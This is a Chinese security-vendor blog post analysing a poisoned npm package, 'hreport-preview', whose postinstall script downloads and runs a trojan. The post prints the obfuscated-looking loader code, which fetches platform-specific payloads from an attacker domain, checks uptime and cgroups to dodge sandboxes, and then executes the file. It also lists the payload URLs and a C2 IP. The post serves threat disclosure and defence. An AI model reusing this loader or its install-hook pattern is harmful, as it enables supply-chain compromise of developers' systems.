当前位置: 首页 > news >正文

中路对线发现正在攻防演练中投毒的红队大佬

背景

2023年8月14日晚,墨菲安全实验室发布《首起针对国内金融企业的开源组件投毒攻击事件》NPM投毒事件分析文章,紧接着我们在8月17日监控到一个新的npm投毒组件包 hreport-preview,该投毒组件用来下载木马文件的域名地址竟然是 img.murphysec-nb.love(如下图1),且该域名注册时间就是8月14号,投毒者使用的注册邮箱同样是hotmail临时注册的邮箱,很显然大概是上次被我们公开投毒行为的攻击者正在火速赶往中路与我们对线,大哥,速度要不要这么快 -_-! 

图1:whois查询

图1:whois查询

当天中午,我们还收到位于大洋彼岸漂亮国科罗拉多州、同样关注此事的软件供应链安全创业公司phylum.io  CTO Louis来信(见图2),询问该投毒组件是否是我们所为,很是尴尬。

图片

 图2:phylum来信询问投毒包情况

投毒事件分析

8月17日上午7点,墨菲安全实验室监控到用户 rowebrighttix(邮箱:Rowe_Brighttix@hotmail.com)向NPM上传了携带远控木马的NPM组件包 hreport-preview(见图3)。

图片

 图3: NPM仓库 hreport-preview 组件包

Readme中标题为Integrate common functions(集成公共功能) ,而下方列举的常用函数名来自于一篇中文文章(见图4),因此投毒者大概率有中文背景。

图4:《56个JavaScript 实用工具函数助你提升开发效率!》文章中提及相关函数名

 图4:《56个JavaScript 实用工具函数助你提升开发效率!》文章中提及相关函数名

代码分析

当用户安装组件包时会执行 package.json 中的 postinstall 语句 node index.js,进而针对Windows/Mac/Linux系统分别从以下网址下载恶意木马,该木马会与投毒者的C2服务器(如:152.195.38.76)建立远程连接,进而执行恶意命令、上传/下载文件等操作,疑似被攻防演练的红队所利用:

  • https://img.murphysec-nb.love/w_x32.exe

  • https://img.murphysec-nb.love/m_arm

  • https://img.murphysec-nb.love/l_x64


//index.js 下载恶意木马
//......function check(){(async () => {const result = await getip();if (result){let status = false;let donwoload = ""const platform = os.platform();const arch = os.arch();if (platform === 'win32') {if (uptimeMinutes.toFixed(2) > 10){donwoload="https://img.murphysec-nb.love/"+"w_"+arch+".exe"status = true}} else if (platform === 'darwin') {if (uptimeMinutes.toFixed(2) > 10){donwoload="https://img.murphysec-nb.love/"+"m_"+archstatus = true}} else if (platform === 'linux') {donwoload="https://img.murphysec-nb.love/"+"l_"+archawait (async () => {const result = await checkCgroup();if (result) {status = true} else {if (uptimeMinutes.toFixed(2) > 10){status = true}}})();} else {return}if(status) {await (async () => {const result = await downloadAndSaveFile(donwoload);if (result !=null){if (platform === 'linux' ||platform === 'darwin' ){addExecutablePermission(result)}runInBackground(result)}})();}else {process.exit(0);}}})();}

IOC

图片

 

参考链接

  • https://mp.weixin.qq.com/s/_bYduwlqMT3P5xQbtwg3FA

  • https://www.npmjs.com/package/hreport-preview

  • https://juejin.cn/post/7019090370814279693

排查工具及投毒情报

墨菲安全提供产品可实时拦截针对开源组件的投毒

墨菲安全的私有源网关产品可对npm、pip、maven等中央仓库的投毒事件进行实时的检测和拦截,同时支持对高危漏洞实现基线管理,目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。

墨菲安全提供实时的开源组件投毒情报预警可订阅

墨菲安全0day漏洞及投毒情报覆盖最新的0day、1day及投毒情报预警,所有情报经过严格的安全专家研判,保障企业获取的第一手的高质量漏洞及投毒情报,更有比CVE漏洞库多25+额外的详细分析字段,目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。

以上功能企业可通过以下方式申请试用:

一、长按二维码申请:

图片

 

二、访问申请链接:

https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe

 

http://www.lryc.cn/news/129134.html

相关文章:

  • 【LINUX相关】生成随机数(srand、/dev/random 和 /dev/urandom )
  • spark使用心得
  • 什么是边车
  • vue项目打包成exe文件
  • 基于MFCC特征提取和GMM训练的语音信号识别matlab仿真
  • client-go实战之十二:选主(leader-election)
  • 2023年即将推出的CSS特性对你影响大不大?
  • opencv实战项目-停车位计数
  • NLP文本匹配任务Text Matching [无监督训练]:SimCSE、ESimCSE、DiffCSE 项目实践
  • 复习vue3,简简单单记录
  • 【自用】云服务器 docker 环境下 HomeAssistant 安装 HACS 教程
  • 使用dockerfile手动构建JDK11镜像运行容器并校验
  • 编程语言学习笔记-架构师和工程师的区别,PHP架构师之路
  • Streamlit 讲解专栏(十):数据可视化-图表绘制详解(上)
  • 其他行业跳槽转入计算机领域简单看法
  • Unity制作一个简单的登入注册页面
  • 常用游戏运营指标DAU、LTV及参考范围
  • 标准模板库STL——deque和list
  • 分类预测 | MATLAB实现WOA-CNN-BiGRU-Attention数据分类预测
  • C++ Primer Plus 第6版 读书笔记(10) 第十章 类与对象
  • 基于C++ 的OpenCV绘制多边形,多边形多条边用不用的颜色绘制
  • (六)、深度学习框架中的算子
  • Redis实现共享Session
  • 网络通信原理UDP协议(第五十课)
  • 43、TCP报文(一)
  • 【JavaScript】使用js实现滑块验证码功能与浏览器打印
  • 【使用群晖远程链接drive挂载电脑硬盘】
  • easyx图形库基础4:贪吃蛇
  • 哈夫曼树(赫夫曼树、最优树)详解
  • 智慧建筑工地平台,通过信息化技术、物联网、人工智能技术,实现对施工全过程的实时监控、数据分析、智能管理和优化调控